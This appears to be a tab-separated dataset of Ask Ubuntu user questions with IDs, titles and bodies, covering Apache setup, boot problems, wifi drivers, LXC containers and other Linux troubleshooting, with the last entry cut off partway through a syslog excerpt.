446266	point apache2 to my own index.html folder ?	in apache2 i am trying to get a folder that already has index files , video , picures ( completely already built website ) and put the folder in www and direct or point apache2 to one of the index files inside that folder so the web can run , the folder contains a website already configured with additional pages that are already configured but i need to point apache to that folder instead of the default index.html . any one knows how ?
446267	no display on main monitor and screen distortion/flickering on external monitor ; i ca n't read the instructions	i use 12.04 lts on my acer e1-472g , but it displays nothing on the monitor . if i connect an external monitor , it displays distorted images in diagonally separated sections . i do not understand any of the wizards i found , to solve the problem . this is how it looks : has anyone encountered this problem and found a solution ?
446268	bumblebee optirun crossover games	i 've been trying to play a ragnarok online private server with wine but this specifically server gets stuck in a faded login screen , with sound . so i installed crossover and it runs nice ! but i need to run optirun in order to use my nvidia geforce 630m instead of intel ivybridge but i just ca n't find how to insert this command on crossover applications . thanks ! ubuntu 12.04 , crossover 13.1 , limitro ( limit-ro.net )
446271	shutdown gets stuck on splash screen	i have just installed ubuntu 12.04lts on my old laptop , dual boot with windows xp . laptop specs : gateway mx6128 , 2gb ram , 32 bit i am completely new to linux ... never used it in my life but giving it a shot . i know how to pull up the terminal and copy commands from this help page . that 's about it . i have two problems ... 1 ) i ca n't see any wireless networks and 2 ) shutdown and restart do not finish . i 'll put the more complicated wireless problem in another question , so lets start with the shutdown problem . when i select shutdown from the menu bar , it goes to the ubuntu splash screen and just sits there with the 5 dots changing from orange to white . it never shuts down . i 've left it all night like that and it still does n't shut down . i have to hold down the power button to power off . the problem is identical if i ask it to shut down or restart . i read in another post about hitting esc to see the messages so i did it and something looks suspicious : could not write bytes : broken pipe [ ok ] saned disabled ; edit /ect/default/saned * checking battery state ... broadcast message from root @ gateway-laptop ( unknown ) at 0:03 ... the system is going down for halt now ! acpid : exiting checking for running unattended-upgrades : speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * stopping network connection manager wicd [ ok ] * asking all remaining processes to terminate ... [ ok ] * killing all remaining processes ... [ fail ] modem-manager [ 744 ] : < info > caught signal 15 , shutting down ... * deconfiguring network interfaces ... [ ok ] * deactivating swap ... [ ok ] umount : /run/lock : not mounted umount : /run/shm : not mounted mount : / is busy * will now halt any ideas on what i should do ? thanks
446272	installing ubuntu onto an empty hard disk , using osx	i have been trying to install ubuntu on an empty hard disk in my desktop computer , using a dvd , burned from an .iso . i used a mac to download and burn the dvd several times again , using fresh downloads and new disks , but every time it fails to boot the .iso ; a message appears in translation . i have also tried to install ubuntu using a flash-drive , with the same effect . please help !
446273	error : unknown filesystem . grub resuce >	i installed ubuntu 12.04 32-bit with a live cd and asked it to wipe windows . i had a dual boot before and did not really like windows anyway . now when i boot it without the cd i get this error message : error : unknown filesystem . grub resuce > i am not sure what to do with this error message . i have saved all my data from all 4 hard drives in the desktop . i am not sure which one ubuntu is on , as i am totally new to this . i have tried to fix this for a month and have been unsuccessful . i am happy to reformat anything if this is going to help me , although i would not know how to do that either . can anyone out there help ? please treat me like a real beginner as far as the steps and terminology are concerned . thanks in advance .
446274	are my choices really limited to stream sound or hear sound ?	i followed the instructions at how can i use pulseaudio virtual audio streams to play music over skype ? in order to load-module sinks . i can stream to my twitch feed no problem . my problem is that i ca n't hear the game sound myself . only my stream can . is there a way that i can stream my sound , as well as hear it while i 'm streaming ?
446280	failed to execute child process `` palimpset '' ( no such file or directory )	i just started using linux and lubuntu . it 's been several weeks of trial and error , with both breaking things and having to reload the os several times . specifically , i have lubuntu running on a cubieboard2 . i have also connected a sata hard drive , and it 's working fine . i can move files to and from it , watch movie files from it using gnome mplayer . i 'm just mentioning this as it may rule out any problems with the hardware . when i right click on the screen , a menu opens up with the title `` openbox '' . i think this is something i installed separately using apt-get , but i ca n't remember now . in the menu there is a selection for 'accessories- > disk utility ' . when i select it i get the error 'failed to execute child process `` palimpset '' ( no such file or directory ) ' . after some searching , it seems this is a component of gnome-disk-manager . i tried removing gnome-disk-manager , then reinstalling it with apt-get install . this did n't solve the problem . i tried 'apt-get install palimpset ' , but there is no such package . all i can come up with in google are vague references , some spelled as palimpsest . also a mention or two of a software bug . i searched my system for both palimpset and palimpsest , but they are not there . can anyone shed some light on this ? even if just the correct keywords to search for . some system information : $ uname -r 3.4.61+ $ cat /etc/lsb-release distrib_id=linaro distrib_release=13.04 distrib_codename=quantal distrib_description= '' linaro 13.04 '' this should say ubuntu somewhere ? i need to double check exactly what i have installed ... this is the name of the image i installed : lubuntu-desktop-nand.img here is the repository information : $ cat /etc/apt/sources.list deb htetep : //ports.ubuntu.com/ubuntu-ports/ quantal main universe deb-src htetep : //ports.ubuntu.com/ubuntu-ports/ quantal main universe =========================================================================== this is an update , with good news . with google and this site 's help i located 2 openbox menu configuration files , called menu.xml . they were located here : /etc/xdg/openbox/menu.xml /usr/share/lubuntu/openbox/menu.xml the entries in the first file did n't match the menu that openbox was displaying , but the entries in the second file did . i changed the section below , in the second file , replacing 'palimpset ' with 'gnome-disks ' : < item label= '' disk utility '' > < action name= '' execute '' > < command > palimpset < /command > < startupnotify > < enabled > yes < /enabled > < /startupnotify > < /action > < /item > just some rambling : it 's a couple of days later , and i had the thought that maybe there is still a problem somewhere . it does n't make any sense that the openbox menu should contain 'default ' entries , regardless of whether you have those apps or not . i wondered if , on start up , openbox looks for a file with information about installed apps , and maybe that file has the wrong information . but that ca n't be it either , because whatever you write into openbox 's menu.xml file is what you get on the screen . it 's all very strange , at least to a newcomer . thanks to : girardengo help.ubuntu.com/community/openbox thread : edit desktop context menu in lubuntu ? ( ubuntuforums.org/showthread.php ? t=2197247 ) also the person that helped in editing the post , whose icon has disappeared .
446289	ubuntu keeps enabling panning and tracking for dual monitor setup	i have two monitors connected to my box ( nvidia graphics with proprietary driver ) . everything was fine until i updated to saucy ( not using default ubuntu desktop but xfce ) . after the update the update , both monitors keep showing the same desktop area and when the mouse touches the screen edges , the desktop will be tracked . i can - however - correct this by using nvidia-settings and moving the right screen to the right of the left screen , but i have to do this after every start . even using the `` save to xorg.conf '' option in nvidia-settings does not do the job . xrandr before my correction : dvi-i-1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 473mm x 296mm panning 2960x1050+0+0 ... hdmi-0 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm panning 2560x1024+0+0 tracking 2960x1050+0+0 border 0/0/0/0 ... . and after : dvi-i-1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 473mm x 296mm ... hdmi-0 connected 1280x1024+1680+0 ( normal left inverted right x axis y axis ) 338mm x 270mm ... i even tried to remove the xorg.conf at all , started with a clean user profile . how can i either make the xserver remember the settings or do the correction with xrandr ?
446291	trouble booting into ubuntu with uefi	i was hoping you all could help . ive done a fresh install of ubuntu 13.10 on my dell laptop . when i shut down then restart i get an error msg on my dell screen which reads `` start pxe over ipv6 -- start pxe over ipv4 -- pxe-e18 server responce timeout '' . this lasts on the screen for about three to four minutes then successfully boots into my os . i checked my bios screen and boot order . under `` boot list options '' uefi is selected , but my hd is not in the boot order . it only shows the uefi ip4 and uefi ip6 . however , if i hit f12 at startup and select `` boot from hard drive '' in legacy mode , it boots right into my os . my question is , is it safe to change the boot list options in bios to legacy instead of uefi ? update i think i figured out my issue . when i installed , i booted onto the ubuntu live dvd in legacy and not uefi . thus installing it in legacy mode . does this sound like what could be causing the issue ? do i need to reinstall in uefi mode or can i safely still use legacy ? what about installing grub in uefi from the live dvd ?
446294	how to start tomcat7 when catalina.sh does not work ?	i installed tomcat7 via the command sudo apt-get install tomcat7 , now i went to /usr/share/tomcat7/bin and inputted catalina.sh but the following error occured can not find /home/mukund/usr/share/tomcat7/bin/setclasspath.sh this file is needed to run this program what did i wrong ? how to start apache tomcat ? please give the solution in step by step thanks
446295	dash and spuer shortcut key problem	i recently encountered a problem : pressing `` super '' stopped opening dash . i works fine with other combinations . so i checked in ccsm in unity plugin if everything is set right ... and it is ... super is binded to show dash , launcjer and help overlay . so i tried to change it to something else and then reverse it back ... did n't help . i set shortcut to super+a , no change , but when i reveresd it to only super , combination started to work even though it was set to only super now . i have literally no idea what is going on with it ... thx for any help edit noob me , i just realised super+a is a shortcut fo app lens ... but still problem with dash exists
446297	double screen 1 fullscreen	i hook up my laptop running ubuntu 13.10 to my tv using a hdmi cable the thing is that i would like to work as i watch a movie , but when i click on the screen on the laptop , i stop getting a fullscreen movie on my tv , is there a way to fix this ? tx in advance
446298	fglrx : suspend on lid_closed does not work	i 'm on a samsung 535u3c with lubuntu 13.10 . since powermanagement did not work at all ( neither hibernate nor suspend : hibernate brought to a complete reboot , suspend was unable to awake the screen ) in the default configuration i installed the newest catalyst driver . now , suspend works . but suspend on lid_closed does not . i checked my /etc/acpi and i found there this : /events fglrx-ati-config fglrx-lid-config fglrx-powermode.sh looking into the scripts , at least as far as i understand , lid_closed is defined and should work . but it does not .
446300	i accidentally formatted the wrong volume - is it possible to restore the old ext4 filesystem ?	i just formatted the wrong volume - is it possible to restore the old ext4 partion ? of course that happened after deleting the old backup - great .
446301	bug in lts 12.04 amd 64 iso file	i downloaded latest 64 bit version of ubuntu 12.04 lts as an .iso file ( ubuntu-12.04.4-desktop-amd64 ) . and make my pen drive bootable using universal-usb-installer-1.9.5.2 . when i try to install ubuntu on my pc , every thing was ok until last moment when setup tried to install grub2 . the file was missing . download link is http : //ubuntu-releases.mirror.net.in/releases//precise/ubuntu-12.04.4-desktop-amd64.iso what has gone wrong ? please help .
446303	wireless to wireless bridge using hostapd on ubuntu 12.04	i have a research detecting unauthorized ap , i make topology : tp link as legitimate ap -- -- -- rogue access point -- -- -- - user from the topology above i need to make legimate ap -- rap -- user in one network not different network ; because i need the value of rtt ping from server to user . in my understanding that if i used dhcp and nat that means i will have different network between user and legitimate ap so the rtt ping value ca n't be grep my problem is : user can not connect to rap ; they ca n't associate with it although my rap ssid have appeared this my hardware spec ( as rap device ) wireless : broadcom bcm4312 802.11b/9 i know this wireless does n't support with master ap so add usb dongle tenda w311m [ 2 unit ] one device to connect to legitimate ap and another to make it as rogue ap root @ nuha-pc : ~ # lspci | grep broadcom 03:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) root @ nuha-pc : ~ # lsusb | grep ralink bus 002 device 004 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter here is my configuration root @ nuha-pc : ~ # gedit /etc/network/interfaces auto lo br0 iface lo inet loopback # wireless wlan0 allow-hotplug wlan0 iface wlan0 inet manual # eth1 connected to the isp router allow-hotplug wlan1 iface wlan1 inet manual # setup bridge iface br0 inet static bridge_ports wlan0 wlan1 address 10.10.10.201 netmask 255.255.255.0 network 10.10.10.0 # # isp router ip , 10.10.10.1 also runs dhcpd # # gateway 10.10.10.1 dns-nameservers 10.10.10.1 # # # http : //www.cyberciti.biz/faq/debian-ubuntu-linux-setting-wireless-access-point/ # # # # root @ nuha-pc : ~ # gedit /etc/hostapd/hostapd.conf interface=wlan0 bridge=br0 driver=nl80211 country_code=id # # # set your ssid # # # ssid=thesis_2 hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 root @ nuha-pc : ~ # gedit /etc/default/hostapd daemon_conf= '' /etc/hostapd/hostapd.conf '' run_daemon= '' yes '' daemon_opts= '' -dd '' oot @ nuha-pc : ~ # gedit /etc/sysctl.conf net.ipv4.tcp_syncookies=1 net.ipv4.conf.all.accept_redirects = 1 net.ipv4.conf.all.accept_source_route = 1 net.ipv4.ip_forward=1 net.ipv4.conf.all.secure_redirects = 1 does anyone have the solution about my problem ? thanks in advance
446304	sudo : unknown uid xxxxx : who are you ?	i was using ssh and trying to upgrade a system from ubuntu 10.04 to 12.04 . the connection had an issue so i had to login again to finish the upgrade . after running sudo dpkg -- configure -a that was required it seems that the system no longer recognizes me as a sudoer . if i run any command as sudo i 'll get sudo : unknown uid xxxxx : who are you ? ( xxxxx is for the actual id of course ) and similarly running whoami will return whoami : can not find name for user id xxxxx also when i am trying to ssh i get a permission denied ( despite the fact that i am still logged in in the machine on a different session ) .
446308	keyboard not working after installing windows 8	i had ubuntu on my computer . i then installed windows 8 , after which i could not boot from ubuntu . so i installed grub using boot-repair from a live usb . now , when i boot and see grub , i can use my keyboard to change the options using the arrows . after selecting ubuntu , i am presented with 3 options-my login , guest login , and remote login . if i select guest login , everything works just fine . but if i select my login , the i am not even able to enter my password using the keyboard . using the virtual keyboard , i logged into my account . but after that also , i am not able to use my keyboard . i tried turning acpi off in the grub , but it is n't working . my boot repair link is http : //paste.ubuntu.com/7233665/
446309	check the serial number of vga2usb device from ubuntu command prompt	i have vga2usb device that connected to the ubuntu system . and this system i access online on my ubuntu machine . now i want to check the serial number of attached vga2usb device serial number from ubuntu command prompt . how can i do this ?
446311	how to install and configure smb-ldap client authentication on ubuntu13.10	i had tried to install smb-ldap client on ubuntu 13.10 several times using apt-get install libnss-ldap libpam-ldap nscd nslcd but got failed every time . i 've also referred too many blogs to resolve the issues regarding the same but did n't got the answers or tricks that can fix those problems , hence someone please help me ... ..post the stepwise procedure to install and configuration of smb-ldap client on ubuntu-13.10 .
446315	can not ssh after upgrading to 12.04	i upgraded through ssh a system from 10.04 to 12.04 . after the necessary restart i can not ssh to the system ( permission denied ) . nothing went wrong during the upgrade process and i do n't have physical access to the system at the moment .
446316	is there a writing tool that moves the text rather than the cursor ?	i write quite a lot for my day job . i am wondering whether there is a tool that keeps the cursor always at the same place ( for instance , the middle of the screen ) and move the text up/down as you write . that would save me a lot of scrolling and it might give me a productivity boost . ideally the tool should be able to handle odt documents . an extension in lo would be fine as well .
446317	how to make guest os follow symlinks from shared folder	i have ubuntu desktop as my main os and ubuntu server as my guest os . i created a shared folder called /shared and put in it several symlinks to different folders across my main os . of course , my guest os sees only broken symlinks - because these locations exist only in the main os . how can i make my guest os see the actual content of them ? creating another shared folder is not an option .
446318	install ubuntu on vista	hiall , i am trying to install ubuntu on a satellite laptop running vista , when i get to the ubuntu menu and select `` try ubuntu '' the screen just goes blank and after a few minutes the laptop cuts out , it also does this when i select the `` install ubuntu '' option . i am using a disc that i used before with no problems on a different computer , any ideas please .
446321	can i use ubuntu 12.04 lts in touch screen laptop ?	if i install 12.04 lts in dell touch screen lap , is it touch work properly in normal version of 12.04 ? please replay
446322	ubuntu does not detect my usb connected phone	i connected my phone using an usb cord to my desktop , but ubuntu does not detect the phone . how do i transfer files to and fro from my computer ?
446325	uninstalling win 8.1 and installing ubuntu 13	i am thinking of switching over to linux ubuntu 13 . i am currently using win 8.1 ( i5-4200u ) i know next to nothing about the how-to 's and what-not-to-do 's . should i even try to do this unaided ? or should i take my laptop in to professionals ?
446327	ubuntu 12.04 runs too slow	i am a new ubuntu user . i have installed ubuntu 12.04 on my pc . my pc has been running much too slowly for the last two days . i tried to find a solution , but i am unable to find it . i tried unity 2d , but it also runs too slowly . specifications : ⠀processor : intel pentium cpu g620 @ 2.60ghz x 2 ⠀ram : 2gb ⠀available disk space : 103gb ⠀swap : 2gb
446333	connecting to tomcat7 from android emulator	i can connect to apache server from chrome and firefox by typing 127.0.1.1:8080 and default page is shown , but when i type the same from my android emulator , no webpage is loaded , request timeout error , also if i try to connect via typing localhost this page is shown : problem loading page firefox ca n't establish a connection to the server at localhost what is wrong with my localhost ? i also tried 10.0.2.2 from android emulator , still ca n't connect . what is wrong here ? is my localhost switched ? how to fix it ? please help thanks
446334	what are the issues of having kde libs with gnome and vica versa	i 'm a kde user with one or two of gnome applications , notably tomboy notes . so far i 've not experienced any actual issues that i could pin point to being caused by having gnome libs on my kde based kubuntu system . but i often hear that gnomers avoid kde apps and kde'ers avoid gnome apps . my question is why ! ? extra libs of course means more software to update , more software that can cause bugs , more potential security holes , and more space used on hard drive . but are their any real problems caused , eg incompatibilities or clashing functionalities ? i am so much interested in desktop environment integration issues like missing right-click or double-click functionality on tray icons or inconsistent file dialogs , and so on . note : while writing this i noticed that the version of celectia that i have installed is the gnome version . how that happened i do n't know but this raises another question : is there a way i can list all application that are non-kde native ? eg check for applications that depend on specific gnome packages ( or maybe depend on any gui tool kits other than qt or gtk or xxx ? )
446335	pam authentication using ssh key instead of password	when i try to use chsh to change my default shell , i get prompted for my user password . the problem is i log in using my ssh key and do not have a user password - by design . yes , i can set a password for my user account . i am interested to know if there is a way for chsh to authenticate via pam using my ssh key ? this line is /etc/pam.d/chsh seems to be calling pam auth required pam_shells.so is there anything i can change so that chsh can get authenticated via ssh keys ?
446336	ca n't load into windows 8 after advanced boot repair	i was trying to remove grub 2 . i went into advance options of boot repair and selected 'restore mbr ' . then in mbr options i selected boot windows partition . after restarting i found the grub2 menu still exist plus whenever i try to load into windows uefi boot loader i get error efi/boot/.. not found . anyway to fix this ? also my system partition appears in gparted , so that means it has n't been deleted but it does n't appear in file manager . i 'm using a sony vaio with preinstalled windows 8 .
446339	how to make a wired serial touchpad work in 12.04 lts ?	i have a cirque serial touchpad that i would like to use , even though the usb mouse works fine . checked software center , it shows these are installed : x.org mouse input driver , x.org vm mouse driver , synaptics touchpad driver , simple directmedia layer , x11 utilities . i powered down , unplugged the usb mouse , plugged in the serial touchpad and rebooted , the touchpad does not respond . on the windows computer the regular mouse driver ran the touchpad , no special driver was required . this is not critical but i like the touchpad and a new usb pad costs $ 40 or $ 50 ! have not found a question that covers this situation . any help appreciated .
446345	why ca n't i see the contents of `` trash : /// '' over vnc ?	i 've got a box running ubuntu 13.10 desktop and i 've set up vnc on there with the following in my xstartup file : # ! /bin/sh unset session_manager gnome-session âsession=gnome-classic & gnome-panel & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager & when i browse to my trash i get an error saying this location could not be displayed . sorry , could not display all the contents of `` trash : /// '' : operation not supported
446347	how to decrease step of xf86kbdbrightnessdown and xf86kbdbrightnessup handlers on ubuntu	my hardware supports full 256 steps of screen brightness . unfortunately ubuntu 's default brightness driver uses wrong steps : i need to increase granularity of steps in the dark end of the spectrum , and decrease on the bright end . the following script bright.sh demonstrates how i 'd like the brightness to be handled : # /bin/bash sciezka= '' /sys/class/backlight/intel_backlight '' if [ `` $ 1 '' == `` + '' ] ; then maxbright=`cat $ sciezka/max_brightness` bright=`cat $ sciezka/brightness` bright=`echo `` print ( int ( min ( $ maxbright , $ bright + max ( $ bright * 0.5 , 1 ) ) ) ) '' | python` else if [ `` $ 1 '' == `` - '' ] ; then bright=`cat $ sciezka/brightness` bright=`echo `` print ( int ( max ( 0 , $ bright - max ( $ bright * 0.33 , 1 ) ) ) ) '' | python` fi fi echo $ bright | sudo tee $ sciezka/brightness how do i replace the xf86kbdbrightnessdown and xf86kbdbrightnessup handler with my custom one ? i 'd like to keep this cool osd slider , but use my logic for the actual brightness adjustment .
446348	can openstack heat be used with cloudstack for orchestration or is it specific to openstack ?	i want to know if openstack heat can be used with cloudstack or other cloud platforms for orchestration or if it is specific to openstack .
446350	what are the biggest disadvantages of using a 64bit version of linux over a 32bit and vice-versa	i 've been using ubuntu 12.10 for some time now , but i am very limited when it comes to installing some software such as wine that wo n't run on a 64bit . i want to know what are the biggest disadvantages/advantages of both the 32 and 64 bit . will it be worth switching to a 32bit ? if using a 32bit will my programs still work ? will this command change completely the architecture from 64 to 32bit , or will it just add support to 32bit while keeping the 64bit ? sudo dpkg -- add-architecture i386
446352	sound and wifi not working on hp15-50009tu on ubuntu 12.04 lts	i have a hp 15-d009tu laptop . ubuntu 12.04 lts is installed by my company . the problem is it neither search for wireless network nor have the wifi driver . i ran the additional driver software but it did not solve the problems . i also downloaded the driver from realtek for realtek rtl8188ee 802.11b/g/n wireless lan driver and ran the script but it does not work . now about the sound driver which is quite unique . the sound driver is installed and i checked it from the alsamixer and it is not muted . i can listen through the earphone or external speaker but the laptop speaker is not working . point to be noted here is that through speakers the sound is crackling same is the case with earphone . thanks in advance for your help .
446354	i pressed ctrl with - and now my terminal view become so small , how to recover ?	i thought ctrl with + should work , but it does n't . how could i recover it and zoom out the views ?
446363	execute permission problem with php file	when i create a php file it have not permission execute so i ca n't run php file . i need to set permissions of that file . i want that all created php files have execute permission . new creation file type is -rw-rw-r -- 1 sohel sohel 0 apr 11 15:43 test.php
446364	changing from standard ubuntu13.10 to ubuntu gnome 13.10 ?	on my desktop computer i run ubuntu 13.10 with gnome-shell and gnome classic desktop as installed `` out of the box '' via synaptic . yesterday i installed ubuntu gnome 13.10 on my laptop and it looks and feels nicer than what i have here . would it be easy and low risk to move from the unity distro + gnome-shell to the ubuntu gnome distro ? i have three hd partitions : root , /home and swap . thanks -- thomas
446366	configure microsoft exchange email on ubuntu	i want to configure microsoft exchange emails on ubuntu the way i use it in outlook on windows xp . please help me to find a good step by step article .
446371	matlab 2013a installation on ubuntu 12.04 64 bit	i am using ubuntu 12.04 64 bit . tried to install matlab 2013a from .iso file , but got the following error . can anyone please help -- sudo ./install preparing installation files ... installing ... /tmp/mathworks_2898/sys/java/jre/glnxa64/jre/bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory finished
446372	control pannel to see running applications	as in windows , i would like to see what are all the applications/process being run at present in my ubuntu system . is it possible to get the list of running applications , and how to do so .
446374	lxc container creation fails with `call to cgmanager_move_pid_abs_sync ( blkio ) failed : invalid request` ( ... )	i can not create the lxc container . it used to work a few days later on this system , though . when i do sudo lxc-create -n abc -t ubuntu , the container 's creation process seems to finish successfully ( no error code thrown on exit ) . but when i try to start it : sudo lxc-start -n abc lxc : call to cgmanager_move_pid_abs_sync ( blkio ) failed : invalid request lxc-start : could not find writable mount point for cgroup hierarchy 11 while trying to create cgroup . lxc-start : device or resource busy - cgroup_rmdir : failed to delete /sys/fs/cgroup/blkio/grp_1 lxc-start : device or resource busy - cgroup_rmdir : failed to delete /sys/fs/cgroup/cpu/sys_daemon lxc-start : device or resource busy - cgroup_rmdir : failed to delete /sys/fs/cgroup/cpuset/ lxc-start : failed creating cgroups lxc-start : failed to spawn 'abc' the problem fails the same way on both trusty and saucy templates . is it a grounds to file a bug against ubuntu ? i use ubuntu trusty 14.04
446376	conneted to wlan0 , but have no internet	i have a problem that only occurs on my home network . if i log on to ubuntu , i get a wifi connection , i have an ip-address , everything looks right , but i have no internet connection . i can use the internet on the same laptop running windows , and i can use other wireless networks ( work , school ) on ubuntu . only the home network somehow does n't work . i 'm running ubuntu 12.04 lts , 32-bit . here is my route -n and ifconfig : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 eth0 link encap : ethernet hwaddr bc : ae : c5 : a1:33 : c0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:48 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1739126 errors:0 dropped:0 overruns:0 frame:0 tx packets:1739126 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:170808116 ( 170.8 mb ) tx bytes:170808116 ( 170.8 mb ) wlan0 link encap : ethernet hwaddr 48:5d:60:9d:41:13 inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :4a5d:60ff : fe9d:4113/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:183 errors:0 dropped:0 overruns:0 frame:0 tx packets:3669 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23230 ( 23.2 kb ) tx bytes:402335 ( 402.3 kb ) thank you very much in advance for any help .
446379	juju error executing lxc-clone local-provider	i 'm trying to use juju with local-provider to setup juju-gui ( and owncloud eventually ) . after `` juju deploy juju-gui '' , juju status shows the error : agent-state-info : ' ( error : error executing `` lxc-clone '' : lxc_container : failed mounting /var/lib/lxc/juju-precise-template/rootfs onto /var/lib/lxc/juju-precise-template/rootfs ; lxc_container : error copying storage ; clone failed ) ' i used the following commands : juju init juju switch local juju bootstrap juju deploy juju-gui /var/lib/lxc/ is owned by root , so how can juju access it ? is anyone currently using juju 1.18 with local provider sucessfully ? i read that `` sudo juju bootstrap '' is not necessary anymore . so is juju using unprivileged lxc or planning on doing so ? i 'm running juju version 1.18.0-trusty-amd64 inside a trusty lxc container .
446382	maas for mpi parallel computing on infiniband and slurm scheduler	is it possible to setup : maas working toghether with a job scheduler ( sge , torque , slurm , does n't matter ) , i.e . when the scheduler needs more cpu then maas power up nodes . maas networking over infiniband , and this is the biggest issue i see for the moment . so , summing up my questions is : is it possible to use a maas configured cluster with : a ) ethernet for `` normal '' routing and infiniband for mpi jobs b ) scheduler ( any would be fine ) thanks in advance , regards
446389	enable swift in openstack devstack	i want to enable swift in openstack that i have installed through devstack actually i want to upload files using php open-cloud . is swift necessary to upload files ? i have enable_service swift but it gives error like . internel server error 505 failed to upload image
446394	ca n't connect to network	i am new to ubuntu i hope to turn this machine into a file server either nas or ftp . i have installed the os and when i click on the network icon i get the following message error : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . please select another viewer and try again .
446395	how to turn off software updater ? ( xubuntu )	is it possible to turn `` software updater '' off ? it pops up on startup every single time offering new ( unwanted ) updates . i have tried to set `` do n't check for updates '' and all this kind of stuff in software updater settings . but it still pops up . it 's annoying , could you advice how to get rid of it ?
446397	wired network card not recognized with ubuntu 12.04 , dell inspiron laptop	i installed ubuntu 12.04 next to my win xp and both wired and wireless card does n't work . my laptop is dell inspiron 6400 . i went over a few threads here with limilar issue but it did n't work for me . could you pls help me with setting up my wired connection ? zdeny @ z-nb : /media/uui/driver/linux/b44-1.00g $ lspci | grep broadcom 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) zdeny @ z-nb : /media/uui/driver/linux/b44-1.00g $ ifconfig lo link encap : místní smyčka inet adr:127.0.0.1 maska:255.0.0.0 inet6-adr : : :1/128 rozsah : počítač aktivováno smyčka běží mtu:65536 metrika:1 rx packets:960 errors:0 dropped:0 overruns:0 frame:0 tx packets:960 errors:0 dropped:0 overruns:0 carrier:0 v kolizí:0 délka odchozí fronty:0 přijato bajtů : 78320 ( 78.3 kb ) odesláno bajtů : 78320 ( 78.3 kb ) zdeny @ z-nb : /media/uui/driver/linux/b44-1.00g $
446401	nautilus crashes accessing a certain folder	nautilus exits when i try to access a certain folder . this is what it says when started from the command line : user @ computer : ~/dokumente/briefe $ nautilus ./ initializing arronax v0.05 ... sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed syntax warning : may not be a pdf file ( continuing anyway ) syntax error : could n't find trailer dictionary syntax error : could n't read xref table error loading document : file type einfaches textdokument ( text/plain ) is not supported sys:1 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed speicherzugriffsfehler ( speicherabzug geschrieben ) user @ computer : ~/dokumente/briefe $ i 'm on ubuntu 13.10 with gnome-shell classic . i followed some advice from other posts , e.g . removed ubuntu one , ran sudo apt-get purge nautilus-open-terminal and restarted the computer , but the error remains .
446403	wifi adapter has problem aquiring ipv4 automatically in ubuntu 13.10	this is a problem in ubuntu 13.10 and it 's a problem with the wifi . ubuntu will never connect to the network . all of my other devices work fine . the computer detects the network and pops up the wifi password dialog . i enter the correct password , click ok and it tries to connect for a few seconds and then asks for the password again . i am using my laptop inspiron n4010 wireless adapter which was working fine under windows and ubuntu 13.04 . i searched google for a few hours and did n't find any working answer , maybe someone here could help ? i had no problem connecting to wireless networks before this even in ubuntu 13.10 . this problem just occurs when i try to connect to a special router : d-link dsl-2730u ! there is another problem in networking of my laptop with ubuntu 13.10 which is explained here . may be these two problems originating from a single source ? if i set the connection ipv4 address manually , the wireless connection is established , but i have no internet access . even i have no access to the router gateway ( ping replies destination host unreachable ) . before setting ipv4 address manually in my connection ( automatic ( dhcp ) ) , sudo tail -f /var/log/syslog displays : apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224824 ] cfg80211 : world regulatory domain updated : apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224830 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224834 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224836 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224839 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224842 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:10:24 me-inspiron-n4010 kernel : [ 51426.224844 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:10:26 me-inspiron-n4010 avahi-daemon [ 1040 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 10 14:10:26 me-inspiron-n4010 avahi-daemon [ 1040 ] : new relevant interface eth1.ipv6 for mdns . apr 10 14:10:26 me-inspiron-n4010 